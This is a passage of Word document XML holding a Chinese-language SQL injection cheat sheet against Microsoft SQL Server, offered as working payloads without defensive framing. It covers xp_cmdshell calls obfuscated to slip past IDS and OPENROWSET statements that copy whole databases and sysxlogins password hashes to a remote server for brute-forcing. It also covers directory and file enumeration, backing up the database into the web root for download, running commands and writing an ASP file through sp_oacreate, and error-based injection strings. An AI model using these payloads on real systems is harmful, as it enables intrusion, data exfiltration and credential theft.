        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的检测</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>使用变量</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp'+'_cm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>dshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>开启远程数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>基本语法</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'select * from table1' ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>: (1) OLEDB Provider name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>其中连接字符串参数可以是任何端口用来连接</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from OPENROWSET('SQLOLEDB', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>from table' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>复制目标主机的整个数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有远程表到本地表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>基本语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'select * from table1') select * from table2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这行语句将目标主机上</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>table2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中的所有数据复制到远程数据库中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>table1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中。实际运用中适当修改连接字符串的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>地址和端口，指向需要的地方，比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/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table1') select * from table2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_sysdatabases') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from master.dbo.sysdatabases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_sysobjects') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from user_database.dbo.sysobjects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_syscolumns') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from user_database.dbo.syscolumns </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>复制数据库：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>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table1') select * from database..table1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table2') select * from database..table2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>复制</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>哈西表</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）登录密码的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>存储于</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sysxlogins</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>中。方法如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into OPENROWSET('SQLOLEDB', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>_sysxlogins') select * from database.dbo.sysxlogins </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>之后，就可以进行暴力破解。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>遍历目录的方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>先创建一个临时表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>temp </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';create table temp(id nvarchar(255),num1 nvarchar(255),num2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>nvarchar(255),num3 nvarchar(255));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">';insert temp exec master.dbo.xp_availablemedia;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得当前所有驱动器</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得子目录列表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得所有子目录的目录树结构</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>并寸入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>temp</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'type </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">c:\web\index.asp';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查看某个文件的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>适用权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>写入表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('sysadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('serveradmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('setupadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('diskadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_MEMBER('db_owner'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>把路径写到表中去：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table dirs(paths varchar(100), id int)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;insert dirs exec master.dbo.xp_dirtree 'c:\'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs where paths not in('@Inetpub'))-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table dirs1(paths varchar(100), id int)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;insert dirs exec master.dbo.xp_dirtree 'e:\web'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs1)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>把数据库备份到网页目录：下载</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname; set @a=db_name();backup database @a to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>disk='e:\web\down.bak';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype=char(85)) T order by id desc) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>参看相关表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select user_id from USER_LOGIN) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0=(select user from USER_LOGIN where user&gt;1) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-=- wscript.shell example -=- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'wscript.shell', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'run', NULL, 'notepad.exe' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sp_oamethod @o, 'run', NULL, 'notepad.exe'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @f int, @t int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @line varchar(8000) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'scripting.filesystemobject', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'readline', @line out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>while( @ret = 0 ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>begin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>print @line </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'readline', @line out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>end </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @f int, @t int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'scripting.filesystemobject', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'createtextfile', @f out, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'c:\inetpub\wwwroot\foo.asp', 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'writeline', NULL, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'speech.voicetext', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oasetproperty @o, 'speed', 150 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>to,us', 528 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>waitfor delay '00:00:05' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>servers are belong to us', 528 waitfor delay '00:00:05'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>适用权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PUBLIC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.xp_dirtree 'c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回的信息有两个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>subdirectory</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>depth</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Subdirectory</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段是字符型，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>depth</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段是整形字段。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>create table dirs(paths varchar(100), id int) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>建表，这里建的表是和上面</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>相</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>关连</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>，字段相等、类型相同。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert dirs exec master.dbo.xp_dirtree 'c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>只要</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>我们建表与</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>存储进程返回的字段相定义相等就能够执行！</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>达到写表的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>效果</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>步步达到我们想要的信息！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1794" w:rsidRDefault="001F1794">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F1794" w:rsidRDefault="001F1794">
      <w:r w:rsidRPr="001F1794">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看看是什么权限的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select IS_MEMBER('db_owner')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否有读取某数据库的权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1= (Select HAS_DBACCESS('master')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数字类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and char(124)%2Buser%2Bchar(124)=0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字符类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and char(124)%2Buser%2Bchar(124)=0 and ''=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
